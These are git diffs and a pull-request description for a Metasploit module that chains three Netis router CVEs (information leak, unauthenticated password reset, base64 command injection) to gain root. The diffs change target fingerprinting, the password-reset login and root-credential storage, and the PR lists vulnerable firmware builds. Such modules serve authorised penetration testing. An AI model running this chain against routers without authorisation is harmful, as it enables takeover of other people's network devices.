--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to
           command execution, potentially allowing the attacker to take full control of the router.
           An attacker needs to be authenticated to initiate this RCE, however CVE-2024-48457 allows an unauthenticated
-          attacker to reset the Wifi and Admin password, hence gaining full admin access to the router to execute the RCE.
+          attacker to reset the Wifi and router password, hence gaining full root access to the router to execute the RCE.
 
           Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
           information of the router which can be used by the attacker to determine of the router is running specific vulnerable
@@ -60,9 +60,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-48455'],
           ['CVE', '2024-48456'],
           ['CVE', '2024-48457'],
-          ['URL', 'https://attackerkb.com/topics/L6qgmDIMa1/cve-2024-48455'],
-          ['URL', 'https://attackerkb.com/topics/Urqj4ggP4j/cve-2024-48456'],
-          ['URL', 'https://attackerkb.com/topics/ty1TOgc40f/cve-2024-48457'],
           ['URL', 'https://github.com/users/h00die-gr3y/projects/1']
         ],
         'DisclosureDate' => '2024-12-27',

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -60,6 +60,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2024-48455'],
           ['CVE', '2024-48456'],
           ['CVE', '2024-48457'],
+          ['URL', 'https://attackerkb.com/topics/L6qgmDIMa1/cve-2024-48455'],
+          ['URL', 'https://attackerkb.com/topics/Urqj4ggP4j/cve-2024-48456'],
+          ['URL', 'https://attackerkb.com/topics/ty1TOgc40f/cve-2024-48457'],
           ['URL', 'https://github.com/users/h00die-gr3y/projects/1']
         ],
         'DisclosureDate' => '2024-12-27',

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           attacker to reset the Wifi and router password, hence gaining full root access to the router to execute the RCE.
 
           Last but not least, CVE-2024-48455 allows for unauthenticated information disclosure revealing sensitive configuration
-          information of the router which can be used by the attacker to determine of the router is running specific vulnerable
+          information of the router which can be used by the attacker to determine if the router is running specific vulnerable
           firmware.
 
           The following router firmware versions are vulnerable:
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
         }
       )
     )

--- a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
+++ b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_48456_and_48457.rb
@@ -15,10 +15,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Netis router unauthenticated RCE combining CVE-2024-48456 and CVE-2024-48457.',
+        'Name' => 'Netis Router Exploit Chain Reactor (CVE-2024-48455, CVE-2024-48456 and CVE-2024-48457).',
         'Description' => %q{
-          Several Netis Routers suffer from a command injection vulnerability at the change admin password page
-          of the router web interface (see CVE-2024-48456 for more details).
+          Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection
+          vulnerability at the change admin password page of the router web interface (see CVE-2024-48456 for more details).
           The vulnerability stems from improper handling of the 'password' and 'new password' parameter within the
           router's web interface. Attackers can inject a command in the 'password' or 'new password' parameter,
           encoded in base64, to exploit the command injection vulnerability. When exploited, this can lead to
@@ -49,7 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
           * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
           * netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
           * Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
-          * potentially others
+          * GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
+          * potentially others...
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -126,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     # in some cases no SUCCESS response is returned however the password has been set succesfully
     # therefore check if the login is successfull and get the password cookie
-    print_status('Logging in with admin password to set the password cookie.')
+    print_status("Logging in with the new admin password #{@password} to get the password cookie.")
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, '/cgi-bin/login.cgi'),
@@ -135,9 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'password' => @password
       }
     })
-    return true if res && res.code == 200 && res.body.include?('SUCCESS')
-
-    false
+    return res&.code == 200 && res.body.include?('SUCCESS')
   end
 
   # CVE-2024-48456: remote code execution in the parameter password at the change admin password page at
@@ -185,30 +184,33 @@ class MetasploitModule < Msf::Exploit::Remote
         'wl_link' => 0
       }
     })
-    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')
+    return CheckCode::Unknown('No valid response received from target.') unless res&.code == 200 && res.body.include?('version')
 
     # trying to get the model and version number
     # unfortunately JSON parsing fails for some routers, so we need to use this ugly REGEX :-(
-    version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)
+    # Examples:
+    # {'version':'Netis(MW5360)-V1.0.1.98','vender':'RUSSIA','model':'MW5360','time_now':'2024/12/29 01:37:58','sys_date':'2024'}
+    # {"version":"netis(NC65)-V3.0.0.3800","vender":"CIS","easy_mesh":"EASYMESH","module":"NC65v2","ax_support":"0"}
+    version = res.body.match(/(?:version\s*'|")\s*:\s*.?((\\|[^'|"])*)/)
     # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison
     unless version.nil?
-      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop
+      version_number = version[1].upcase.split('-V')[1].gsub(/[[:space:]]/, '')
       # The model number part is usually something like Netis(NC63)-V3.0.0.3131,
       # but occassionally you see things like Stonet-N3D-V3.0.0.4142, or NX10-V3.0.0.4142
-      if version[2].upcase.split('-V')[0].include?('-')
-        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
-      elsif version[2].upcase.split('-V')[0].include?('(')
-        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
+      if version[1].upcase.split('-V')[0].include?('(')
+        model_number = version[1].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
+      elsif version[1].upcase.split('-V')[0].include?('-')
+        model_number = version[1].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
       else
-        model_number = version[2].upcase.split('-V')[0]
+        model_number = version[1].upcase.split('-V')[0]
       end
       # Check if target is vulnerable
       if version_number
         case model_number.split('V')[0] # split if any hardware version is part of the model number (NC65V2)
-        when 'NC63', 'NC65', 'NC66', 'NC21', 'NX10', 'NX30', 'NX31', 'NX62', 'MW5360'
-          return CheckCode::Appears(version[2].chop.to_s) if Rex::Version.new(version_number) >= Rex::Version.new('1.0.0.0')
+        when 'NC63', 'NC65', 'NC66', 'NC21', 'NX10', 'NX30', 'NX31', 'NX62', 'MW5360', 'ALPHA-AC3', 'ALPHA-AC2', 'ALPHA-AC4'
+          return CheckCode::Appears(version[1].to_s) if Rex::Version.new(version_number) >= Rex::Version.new('1.0.0.0')
         end
-        return CheckCode::Safe(version[2].chop.to_s)
+        return CheckCode::Safe(version[1].to_s)
       end
     end
     CheckCode::Safe
@@ -216,6 +218,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     fail_with(Failure::NoAccess, 'Unable to set the router admin password and retrieve the password cookie.') unless set_admin_password
+
+    # store router admin password in msf database which is also the password of root ;-)
+    print_status('Saving admin/root credentials at the msf database.')
+    store_valid_credential(user: 'root', private: @password)
+
+    # wait a while with exploit execution to avoid locking
+    sleep(datastore['CMD_DELAY'])
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
     when :linux_dropper


### PR DESCRIPTION
Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from a command injection vulnerability at the change admin password page of the router web interface (see [CVE-2024-48456](https://attackerkb.com/topics/Urqj4ggP4j/cve-2024-48456) for more details).
The vulnerability stems from improper handling of the password and new password parameter within the router's web interface. Attackers can inject a command in the password or new password parameter, encoded in base64, to exploit the command injection vulnerability.
When exploited, this can lead to command execution, potentially allowing the attacker to take full control of the router.
An attacker needs to be authenticated to initiate this RCE, however [CVE-2024-48457](https://attackerkb.com/topics/ty1TOgc40f/cve-2024-48457) allows an unauthenticated
attacker to reset the Wifi and router password, hence gaining full root access to the router to execute the RCE.

Last but not least, [CVE-2024-48455](https://attackerkb.com/topics/L6qgmDIMa1/cve-2024-48455) allows for unauthenticated information disclosure revealing sensitive configuration information of the router which can be used by the attacker to determine if the router is running specific vulnerable firmware.

The following router firmware versions are vulnerable:

- [x] netis_MW5360_V1.0.1.3031_fw.bin
- [x] Netis_MW5360-1.0.1.3442.bin
- [x] Netis_MW5360_RUSSIA_844.bin
- [x] netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
- [x] netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- [x] netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- [x] Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
- [x] netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
- [x] netis_NC65_V3.0.0.3749.bin
- [x] Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
- [x] Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
- [x] netis_NX10_V2.0.1.3582_fw.bin
- [x] netis_NX10_V2.0.1.3643.bin
- [x] Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
- [x] netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
- [x] netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
- [x] Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
- [x] GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
     
and potentially others...
